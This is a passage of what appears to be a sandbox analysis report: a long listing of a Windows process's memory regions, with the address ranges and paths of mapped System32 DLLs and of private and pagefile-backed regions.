0x7fefacc0000 end_va = 0x7fefacc8fff entry_point = 0x7fefacc0000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 623 start_va = 0x7fefacd0000 end_va = 0x7fefacd8fff entry_point = 0x7fefacd0000 region_type = mapped_file name = "tbs.dll" filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll") Region: id = 624 start_va = 0x7feface0000 end_va = 0x7fefad35fff entry_point = 0x7feface0000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 625 start_va = 0x7fefad40000 end_va = 0x7fefad9dfff entry_point = 0x7fefad40000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 626 start_va = 0x7fefada0000 end_va = 0x7fefadb7fff entry_point = 0x7fefada0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 627 start_va = 0x7fefadc0000 end_va = 0x7fefadd0fff entry_point = 0x7fefadc0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 628 start_va = 0x7fefadf0000 end_va = 0x7fefae42fff entry_point = 0x7fefadf0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 629 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 630 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 631 start_va = 0x7fefafb0000 end_va = 0x7fefafc3fff entry_point = 0x7fefafb0000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 632 start_va = 0x7fefafd0000 end_va = 0x7fefb036fff entry_point = 0x7fefafd0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 633 start_va = 0x7fefb040000 end_va = 0x7fefb04afff entry_point = 0x7fefb040000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 634 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 635 start_va = 0x7fefb060000 end_va = 0x7fefb06ffff entry_point = 0x7fefb060000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 636 start_va = 0x7fefb070000 end_va = 0x7fefb088fff entry_point = 0x7fefb070000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 637 start_va = 0x7fefb090000 end_va = 0x7fefb0c6fff entry_point = 0x7fefb090000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 638 start_va = 0x7fefb0d0000 end_va = 0x7fefb0e4fff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 639 start_va = 0x7fefb0f0000 end_va = 0x7fefb1b1fff entry_point = 0x7fefb0f0000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 640 start_va = 0x7fefb410000 end_va = 0x7fefb42cfff entry_point = 0x7fefb410000 region_type = mapped_file name = "mmcss.dll" filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll") Region: id = 641 start_va = 0x7fefb430000 end_va = 0x7fefb438fff entry_point = 0x7fefb430000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 642 start_va = 0x7fefb520000 end_va = 0x7fefb54cfff entry_point = 0x7fefb520000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 643 start_va = 0x7fefb670000 end_va = 0x7fefb680fff entry_point = 0x7fefb670000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 644 start_va = 0x7fefb700000 end_va = 0x7fefb70bfff entry_point = 0x7fefb700000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 645 start_va = 0x7fefb710000 end_va = 0x7fefb751fff entry_point = 0x7fefb710000 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 646 start_va = 0x7fefb760000 end_va = 0x7fefb799fff entry_point = 0x7fefb760000 region_type = mapped_file name = "mprapi.dll" filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll") Region: id = 647 start_va = 0x7fefb7a0000 end_va = 0x7fefb7b9fff entry_point = 0x7fefb7a0000 region_type = mapped_file name = "rascfg.dll" filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll") Region: id = 648 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 649 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 650 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 651 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 652 start_va = 0x7fefb830000 end_va = 0x7fefb837fff entry_point = 0x7fefb830000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 653 start_va = 0x7fefb840000 end_va = 0x7fefb84efff entry_point = 0x7fefb840000 region_type = mapped_file name = "ndiscapcfg.dll" filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll") Region: id = 654 start_va = 0x7fefb850000 end_va = 0x7fefb868fff entry_point = 0x7fefb850000 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 655 start_va = 0x7fefb870000 end_va = 0x7fefb8bffff entry_point = 0x7fefb870000 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 656 start_va = 0x7fefb8c0000 end_va = 0x7fefb933fff entry_point = 0x7fefb8c0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 657 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 658 start_va = 0x7fefb960000 end_va = 0x7fefb967fff entry_point = 0x7fefb960000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 659 start_va = 0x7fefbaa0000 end_va = 0x7fefbad4fff entry_point = 0x7fefbaa0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 660 start_va = 0x7fefbf10000 end_va = 0x7fefbf65fff entry_point = 0x7fefbf10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 661 start_va = 0x7fefbf70000 end_va = 0x7fefc09bfff entry_point = 0x7fefbf70000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 662 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 663 start_va = 0x7fefc0f0000 end_va = 0x7fefc2e3fff entry_point = 0x7fefc0f0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 664 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 665 start_va = 0x7fefc790000 end_va = 0x7fefc84afff entry_point = 0x7fefc790000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 666 start_va = 0x7fefc850000 end_va = 0x7fefc856fff entry_point = 0x7fefc850000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 667 start_va = 0x7fefc940000 end_va = 0x7fefc95afff entry_point = 0x7fefc940000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 668 start_va = 0x7fefc960000 end_va = 0x7fefc97dfff entry_point = 0x7fefc960000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 669 start_va = 0x7fefc980000 end_va = 0x7fefc991fff entry_point = 0x7fefc980000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 670 start_va = 0x7fefc9a0000 end_va = 0x7fefc9befff entry_point = 0x7fefc9a0000 region_type = mapped_file name = "spinf.dll" filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll") Region: id = 671 start_va = 0x7fefca70000 end_va = 0x7fefcaa8fff entry_point = 0x7fefca70000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 672 start_va = 0x7fefcab0000 end_va = 0x7fefcab9fff entry_point = 0x7fefcab0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 673 start_va = 0x7fefcac0000 end_va = 0x7fefcaccfff entry_point = 0x7fefcac0000 region_type = mapped_file name = "pcwum.dll" filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll") Region: id = 674 start_va = 0x7fefcbb0000 end_va = 0x7fefcbf6fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 675 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 676 start_va = 0x7fefccd0000 end_va = 0x7fefcd2afff entry_point = 0x7fefccd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 677 start_va = 0x7fefce40000 end_va = 0x7fefce46fff entry_point = 0x7fefce40000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 678 start_va = 0x7fefce50000 end_va = 0x7fefcea4fff entry_point = 0x7fefce50000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 679 start_va = 0x7fefceb0000 end_va = 0x7fefcec6fff entry_point = 0x7fefceb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 680 start_va = 0x7fefcfc0000 end_va = 0x7fefcff1fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 681 start_va = 0x7fefd010000 end_va = 0x7fefd019fff entry_point = 0x7fefd010000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 682 start_va = 0x7fefd0a0000 end_va = 0x7fefd0cefff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 683 start_va = 0x7fefd0e0000 end_va = 0x7fefd14cfff entry_point = 0x7fefd0e0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 684 start_va = 0x7fefd150000 end_va = 0x7fefd163fff entry_point = 0x7fefd150000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 685 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 686 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 687 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 688 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 689 start_va = 0x7fefd4c0000 end_va = 0x7fefd550fff entry_point = 0x7fefd4c0000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 690 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 691 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 692 start_va = 0x7fefd5c0000 end_va = 0x7fefd5cefff entry_point = 0x7fefd5c0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 693 start_va = 0x7fefd660000 end_va = 0x7fefd66efff entry_point = 0x7fefd660000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 694 start_va = 0x7fefd670000 end_va = 0x7fefd6a5fff entry_point = 0x7fefd670000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 695 start_va = 0x7fefd750000 end_va = 0x7fefd8b6fff entry_point = 0x7fefd750000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 696 start_va = 0x7fefd8c0000 end_va = 0x7fefd8f9fff entry_point = 0x7fefd8c0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 697 start_va = 0x7fefd900000 end_va = 0x7fefd919fff entry_point = 0x7fefd900000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 698 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 699 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 700 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 701 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 702 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 703 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 704 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 705 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 706 start_va = 0x7fefe1b0000 end_va = 0x7fefe201fff entry_point = 0x7fefe1b0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 707 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 708 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 709 start_va = 0x7fefe360000 end_va = 0x7feff0e7fff entry_point = 0x7fefe360000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 710 start_va = 0x7feff0f0000 end_va = 0x7feff2c6fff entry_point = 0x7feff0f0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 711 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 712 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 713 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 714 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 715 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 716 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 717 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 718 start_va = 0x7fffff60000 end_va = 0x7fffff61fff entry_point = 0x0 region_type = private name = "private_0x000007fffff60000" filename = "" Region: id = 719 start_va = 0x7fffff62000 end_va = 0x7fffff63fff entry_point = 0x0 region_type = private name = "private_0x000007fffff62000" filename = "" Region: id = 720 start_va = 0x7fffff66000 end_va = 0x7fffff67fff entry_point = 0x0 region_type = private name = "private_0x000007fffff66000" filename = "" Region: id = 721 start_va = 0x7fffff6a000 end_va = 0x7fffff6bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff6a000" filename = "" Region: id = 722 start_va = 0x7fffff6e000 end_va = 0x7fffff6ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff6e000" filename = "" Region: id = 723 start_va = 0x7fffff70000 end_va = 0x7fffff71fff entry_point = 0x0 region_type = private name = "private_0x000007fffff70000" filename = "" Region: id = 724 start_va = 0x7fffff72000 end_va = 0x7fffff73fff entry_point = 0x0 region_type = private name = "private_0x000007fffff72000" filename = "" Region: id = 725 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 726 start_va = 0x7fffff76000 end_va = 0x7fffff77fff entry_point = 0x0 region_type = private name = "private_0x000007fffff76000" filename = "" Region: id = 727 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 728 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 729 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 730 start_va = 0x7fffff7e000 end_va = 0x7fffff7ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff7e000" filename = "" Region: id = 731 start_va = 0x7fffff80000 end_va = 0x7fffff81fff entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 732 start_va = 0x7fffff82000 end_va = 0x7fffff83fff entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 733 start_va = 0x7fffff84000 end_va = 0x7fffff85fff entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 734 start_va = 0x7fffff86000 end_va = 0x7fffff87fff entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 735 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 736 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 737 start_va = 0x7fffff90000 end_va = 0x7fffff91fff entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 738 start_va = 0x7fffff92000 end_va = 0x7fffff93fff entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 739 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 740 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 741 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 742 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 743 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 744 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 745 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 746 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 747 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 748 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 749 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 750 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 751 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 752 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 753 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 754 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 755 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 756 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 757 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 758 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 759 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3214 start_va = 0x12a0000 end_va = 0x12a0fff entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" 